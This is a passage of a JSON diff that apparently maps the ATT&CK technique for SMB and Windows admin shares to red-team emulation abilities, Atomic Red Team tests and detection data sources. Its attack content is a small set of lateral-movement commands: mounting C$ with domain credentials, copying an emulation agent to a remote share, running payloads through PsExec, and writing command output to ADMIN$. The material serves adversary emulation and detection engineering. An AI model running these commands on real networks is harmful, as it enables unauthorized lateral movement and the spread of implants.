+ }, + { + "command": "$path = \"sandcat.go-windows\";\n$drive = \"\\\\#{remote.host.fqdn}\\C$\";\nCopy-Item -v -Path $path -Destination $drive\"\\Users\\Public\\s4ndc4t.exe\";\n", + "source": "data/abilities/lateral-movement/65048ec1-f7ca-49d3-9410-10813e472b30.yml", + "name": "Copy 54ndc47 to remote host (SMB)" + }, + { + "command": "net use \\\\#{remote.host.fqdn}\\C$ /user:#{domain.user.name} #{domain.user.password}\n", + "source": "data/abilities/lateral-movement/aa6ec4dd-db09-4925-b9b9-43adeb154686.yml", + "name": "Mount a windows share" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1021.002", + "display_name": "Remote Services: SMB/Windows Admin Shares", + "atomic_tests": [ + { + "name": "Map admin share", + "auto_generated_guid": "3386975b-367a-4fbb-9d77-4dcf3639ffd3", + "description": "Connecting To Remote Shares\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user_name": { + "description": "Username", + "type": "String", + "default": "DOMAIN\\Administrator" + }, + "share_name": { + "description": "Examples C$, IPC$, Admin$", + "type": "String", + "default": "C$" + }, + "password": { + "description": "Password", + "type": "String", + "default": "P@ssw0rd1" + }, + "computer_name": { + "description": "Target Computer Name", + "type": "String", + "default": "Target" + } + }, + "executor": { + "command": "cmd.exe /c \"net use \\\\#{computer_name}\\#{share_name} #{password} /u:#{user_name}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Map Admin Share PowerShell", + "auto_generated_guid": "514e9cd7-9207-4882-98b1-c8f791bae3c5", + "description": "Map Admin share utilizing PowerShell\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "share_name": { + "description": "Examples C$, IPC$, Admin$", + "type": "String", + "default": "C$" + }, + "map_name": { + "description": "Mapped Drive Letter", + "type": "String", + "default": "g" + }, + "computer_name": { + "description": "Target Computer 
Name", + "type": "String", + "default": "Target" + } + }, + "executor": { + "command": "New-PSDrive -name #{map_name} -psprovider filesystem -root \\\\#{computer_name}\\#{share_name}\n", + "name": "powershell" + } + }, + { + "name": "Copy and Execute File with PsExec", + "auto_generated_guid": "0eb03d41-79e4-4393-8e57-6344856be1cf", + "description": "Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command_path": { + "description": "File to copy and execute", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + }, + "remote_host": { + "description": "Remote computer to receive the copy and execute the file", + "type": "String", + "default": "\\\\localhost" + }, + "psexec_exe": { + "description": "Path to PsExec", + "type": "string", + "default": "C:\\PSTools\\PsExec.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})\n", + "prereq_command": "if (Test-Path \"#{psexec_exe}\") { exit 0} else { exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"$env:TEMP\\PsTools.zip\"\nExpand-Archive $env:TEMP\\PsTools.zip $env:TEMP\\PsTools -Force\nNew-Item -ItemType Directory (Split-Path \"#{psexec_exe}\") -Force | Out-Null\nCopy-Item $env:TEMP\\PsTools\\PsExec.exe \"#{psexec_exe}\" -Force\n" + } + ], + "executor": { + "command": "#{psexec_exe} #{remote_host} -accepteula -c #{command_path}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Execute command writing output to local Admin Share", + "auto_generated_guid": "d41aaab5-bdfe-431d-a3d5-c29e9136ff46", + "description": "Executes a 
command, writing the output to a local Admin Share.\nThis technique is used by post-exploitation frameworks.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Remote computer to receive the copy and execute the file", + "type": "String", + "default": "output.txt" + }, + "command_to_execute": { + "description": "Command to execute for output.", + "type": "String", + "default": "hostname" + } + }, + "executor": { + "command": "cmd.exe /Q /c #{command_to_execute} 1> \\\\127.0.0.1\\ADMIN$\\#{output_file} 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + }, + { + "id": "40161ad0-75bd-11e9-b475-0800200c9a66", + "name": "Net use", + "description": "Mounts a network file share on a target computer", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1021.002", + "name": "Remote Services: SMB/Windows Admin Shares" + }, + "platforms": { + "windows": { + "psh": { + "command": "net use \\\\#{remote.host.ip}\\c$ /user:#{domain.user.name} #{domain.user.password};\n", + "cleanup": "net use \\\\#{remote.host.ip}\\c$ /delete;\n" + } + } + }, + "singleton": true + }, + { + "id": "65048ec1-f7ca-49d3-9410-10813e472b30", + "name": "Copy 54ndc47 (SMB)", + "description": "Copy 54ndc47 to remote host (SMB)", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1021.002", + "name": "Remote Services: SMB/Windows Admin Shares" + }, + "platforms": { + "windows": { + "psh": { + "command": "$path = \"sandcat.go-windows\";\n$drive = \"\\\\#{remote.host.fqdn}\\C$\";\nCopy-Item -v -Path $path -Destination $drive\"\\Users\\Public\\s4ndc4t.exe\";\n", + "cleanup": "$drive = \"\\\\#{remote.host.fqdn}\\C$\";\nRemove-Item -Path $drive\"\\Users\\Public\\s4ndc4t.exe\" -Force;\n", + "parsers": { + "plugins.stockpile.app.parsers.54ndc47_remote_copy": [ + { + "source": "remote.host.fqdn", + "edge": "has_54ndc47_copy" + } + ] + }, + "payloads": [ + "sandcat.go-windows" + ] + } + } + }, + 
"singleton": true, + "requirements": [ + { + "plugins.stockpile.app.requirements.not_exists": [ + { + "source": "remote.host.fqdn", + "edge": "has_54ndc47_copy" + } + ] + }, + { + "plugins.stockpile.app.requirements.basic": [ + { + "source": "remote.host.fqdn", + "edge": "has_share" + } + ] + }, + { + "plugins.stockpile.app.requirements.no_backwards_movement": [ + { + "source": "remote.host.fqdn" + } + ] + }, + { + "plugins.stockpile.app.requirements.reachable": [ + { + "source": "remote.host.fqdn", + "edge": "isAccessibleFrom" + } + ] + } + ] + }, + { + "id": "aa6ec4dd-db09-4925-b9b9-43adeb154686", + "name": "Mount Share", + "description": "Mount a windows share", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1021.002", + "name": "Remote Services: SMB/Windows Admin Shares" + }, + "platforms": { + "windows": { + "psh": { + "command": "net use \\\\#{remote.host.fqdn}\\C$ /user:#{domain.user.name} #{domain.user.password}\n", + "cleanup": "net use \\\\#{remote.host.fqdn}\\C$ /delete\n", + "parsers": { + "plugins.stockpile.app.parsers.share_mounted": [ + { + "source": "remote.host.fqdn", + "edge": "has_share" + } + ] + } + } + } + }, + "singleton": true, + "requirements": [ + { + "plugins.stockpile.app.requirements.not_exists": [ + { + "source": "remote.host.fqdn", + "edge": "has_share" + } + ] + }, + { + "plugins.stockpile.app.requirements.basic": [ + { + "source": "domain.user.name", + "edge": "has_password", + "target": "domain.user.password" + } + ] + }, + { + "plugins.stockpile.app.requirements.req_like": [ + { + "source": "remote.host.fqdn", + "edge": "has_admin", + "target": "domain.user.name" + } + ] + }, + { + "plugins.stockpile.app.requirements.reachable": [ + { + "source": "remote.host.fqdn", + "edge": "isAccessibleFrom" + } + ] + }, + { + "plugins.stockpile.app.requirements.no_backwards_movement": [ + { + "source": "remote.host.fqdn" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + 
"definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated 
